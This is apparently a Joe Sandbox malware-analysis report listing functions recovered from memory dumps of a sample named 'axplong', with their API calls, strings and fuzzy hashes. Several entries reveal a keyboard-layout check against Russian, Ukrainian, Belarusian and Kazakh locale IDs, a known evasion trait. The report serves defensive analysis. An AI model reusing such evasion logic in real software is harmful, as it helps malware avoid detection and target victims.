00000423, xrefs: 0026600A
0000043f, xrefs: 0026603B
Keyboard Layout\Preload, xrefs: 00265F64
00000422, xrefs: 00265FD9
00000419, xrefs: 00265FA8

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 1c9c49138d59c790aa354c06b015c64fd08db9d74c008894af8a63db649a4b98
Instruction ID: 4704c0752a6d888a9c2094fc1ab45e12d81d74e3ee46c732dbb1b2991d4e61eb
Opcode Fuzzy Hash: 1c9c49138d59c790aa354c06b015c64fd08db9d74c008894af8a63db649a4b98
Instruction Fuzzy Hash: 3EE19E71910218ABEB24DFA4CC8DBDEB779AF04304F5042D9E409A7291DB74ABD8CF91

Function 00267D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00267EA3

Strings

JmpxQb==, xrefs: 002681B2
JmpxRL==, xrefs: 00268062
JmpyPb==, xrefs: 0026810A

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 1721193555-2057465332
Opcode ID: db354307f8cc2c9a1d88c2b02e8f47349013f17cf31af2b568f4584e23be3dba
Instruction ID: db7b0f333fb119657bcf129ce09f2bd39f6a3b5aef677d3ce7734a347193c395
Opcode Fuzzy Hash: db354307f8cc2c9a1d88c2b02e8f47349013f17cf31af2b568f4584e23be3dba
Instruction Fuzzy Hash: 68D12470E206549BDF14BB68DC5A7AD7771AB42324F90428CE8196B3C2DF354EE48BD2

Function 00296E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00296E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00296E7D
__dosmaperr.LIBCMT ref: 00296F12

Part of subcall function 00297177: __dosmaperr.LIBCMT ref: 002971AC

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: a111f64b4c54d6e72d718f60cb57622b3e35e248e0f5e009cef186b6ae753239
Instruction ID: f1d35e34e32a26ceec1421c20604ad610e08f449e15ee897172ba9324da0bbe9
Opcode Fuzzy Hash: a111f64b4c54d6e72d718f60cb57622b3e35e248e0f5e009cef186b6ae753239
Instruction Fuzzy Hash: 4E414C75920305ABDF24EFB5EC459AFBBF9EF88300B10442EF856D3611EA30A914CB61

Function 0029D4F4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hpG), xrefs: 0029D4FB

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: hpG)
API String ID: 0-1991059726
Opcode ID: a577cddc49d09d4e29fbfe24ab22984db8aef9a3bf2ca71d29c92cc1865648d7
Instruction ID: f97c0a20175938f0be8a364ccf4742103ee60ee04c5b6dcef724198bee3d9217
Opcode Fuzzy Hash: a577cddc49d09d4e29fbfe24ab22984db8aef9a3bf2ca71d29c92cc1865648d7
Instruction Fuzzy Hash: 8A611432D302168FDF25EFA8E8857EDB7B4EF56314F65811AE449AB250D6309C20EF61

Function 002682B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00268454

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: edad4277a8a1b7ca15ab274f247b832e0995c8cf86d08601acb216cf2c8044af
Instruction ID: 8d60901163b661a1267d817cf47bf53fb3f04eef5a2cb8f4875fd80a2d2bdf9d
Opcode Fuzzy Hash: edad4277a8a1b7ca15ab274f247b832e0995c8cf86d08601acb216cf2c8044af
Instruction Fuzzy Hash: 19513970D202199BEB14EF68CD45BEDB775EB45304F904399E808A73C1EF705AE08B91

Function 00296C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77f4e5fa17a5ba4d51daa1934eddbf4a6cde04554a6bb851bb3cbc4c71092c13
Instruction ID: fa360d73f20cc0f713d3986a6c4b971ef3b9432fe5009b0fceb30cff12bd7e2c
Opcode Fuzzy Hash: 77f4e5fa17a5ba4d51daa1934eddbf4a6cde04554a6bb851bb3cbc4c71092c13
Instruction Fuzzy Hash: 07210772A252087AEF117F649C46FAF37A99F42378F200311F9343B1D1DBB05E259AA1

Function 00296F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00296FB3

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 48a8cd8ab6c67ab7a0fd8c4540f794798d14bfe9ad4e5e6134ba14fe3381aac2
Instruction ID: cc2e8c7472bf54de6a1d4b214541c9fa6cc45d4339ae5240f7603cf4f9b8b015
Opcode Fuzzy Hash: 48a8cd8ab6c67ab7a0fd8c4540f794798d14bfe9ad4e5e6134ba14fe3381aac2
Instruction Fuzzy Hash: 21111CB291020DABDF01DED5D948EDFB7FCAB08314F604266E516E2180EB30EB54CB61

Function 0029D6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0029A5ED,?,002974AE,?,00000000,?), ref: 0029D731

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ac2aa886d1583d5a458cc3621b9a0e61123d94b9a54b7f616829c703163f658e
Instruction ID: 7e2bb4f78edae80290a7243ec7fcd816659e2314f8ec6a898843d3f13667cb7a
Opcode Fuzzy Hash: ac2aa886d1583d5a458cc3621b9a0e61123d94b9a54b7f616829c703163f658e
Instruction Fuzzy Hash: F4F0E93167512667DF212EA6AC05BDBF7999F817B0B184112AC089A181CA60E82066E1

Function 00276AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE ref: 00276B65

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f87da9f4f0c7af2ab8408bdccd6452fc0242ec462281ec2ecbf92c5bb547027f
Instruction ID: 9f0d09109f26f903504d01bfc2c0cf4aef8fa60211625a5eefdc7198cad82f6d
Opcode Fuzzy Hash: f87da9f4f0c7af2ab8408bdccd6452fc0242ec462281ec2ecbf92c5bb547027f
Instruction Fuzzy Hash: DAF0F931E20614EBC700BBA8DC07B1D7B74AB07764F904748E825672D1DB705A248BD3

Function 04CA059C Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3436521034.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ca0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cce6dc5b112f1557e8e1bcee82f222cd597b4a08699f350682b9e98854d5c9d1
Instruction ID: 79a8591989089be6fc736c94f529bbb78bb8e7b4e365065cebdf1f4d3ca562f5
Opcode Fuzzy Hash: cce6dc5b112f1557e8e1bcee82f222cd597b4a08699f350682b9e98854d5c9d1
Instruction Fuzzy Hash: 45E0F1E31084125BD74235E79F382FB6756E7532F93340537F043C21839C852154B272

Function 04CA0593 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3436521034.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ca0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edef89189ebaa5318e604c65d37863f4cc0b960c0754f70604a6969e69eda3a8
Instruction ID: 398b712a590da4bf794cd022962b29daa166168b6c51fe30cdb1401c2ba48a6b
Opcode Fuzzy Hash: edef89189ebaa5318e604c65d37863f4cc0b960c0754f70604a6969e69eda3a8
Instruction Fuzzy Hash: FAE05C9300451257D7422A9799246F66756E6231BC3380967E042C2143DD962155A6B1

Function 04CA05A5 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3436521034.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ca0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b134384c14a30d3c069c54b68ff8c1509ec3c50e3cd148a939feb77cdce609b
Instruction ID: 6cbb3687a8466d819de650c8b220917d0cb380aab4b6dc91148d928b06a1011b
Opcode Fuzzy Hash: 0b134384c14a30d3c069c54b68ff8c1509ec3c50e3cd148a939feb77cdce609b
Instruction Fuzzy Hash: 61E0F1F30086514FEB026956CD206F7779AEB132B5314057BD052C3383EAD53040B556

Non-executed Functions

Function 002A3068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 002A31E3

Strings

1#IND, xrefs: 002A4373
1#INF, xrefs: 002A439E
1#QNAN, xrefs: 002A4381
1#SNAN, xrefs: 002A437A

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: aca440e857c6cebf09a9bd830e587776c16fff0b42ef4628f017ea5af87a381f
Instruction ID: 3e538124bf68dcb15c6326cec4e9fe4dedb5d6fc876beff9982c2d145ba2c337
Opcode Fuzzy Hash: aca440e857c6cebf09a9bd830e587776c16fff0b42ef4628f017ea5af87a381f
Instruction Fuzzy Hash: 05C26F71E246298FDF25CE28DD447E9B3B5EB89304F1441EAE84DE7240EB74AE958F40

Function 002A2BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: ce0c53afc379289a6b166eb6cdc01949730797f12c5ca01219e911f94f2694f7
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 26F15E71E1021ADFDF14CFA8C9806AEB7B1FF49314F15826AE819A7345DB30AE55CB90

Function 0027D312 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0026247E

Strings

'k'd+,, xrefs: 0027D324, 0027DCA4
'k'd+,, xrefs: 0027DCEC

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: 'k'd+,$'k'd+,
API String ID: 2659868963-3091570108
Opcode ID: 917bdcd12a324f4f98da42e939a1d8759953087d58d7cb620c6d9a311674a6d1
Instruction ID: ccb59c036bb0fb67d12ba4efefaf243c14f3ed499cdaacda03ef922e5ecb9ed7
Opcode Fuzzy Hash: 917bdcd12a324f4f98da42e939a1d8759953087d58d7cb620c6d9a311674a6d1
Instruction Fuzzy Hash: 8E518DB2920606DFDB29CF55E885BAAB7F0FF58310F24856AD408EB250D774D950CF90

Function 0027CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,0027CE82,?,?,?,?,0027CEB7,?,?,?,?,?,?,0027C42D,?,00000001), ref: 0027CB33

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
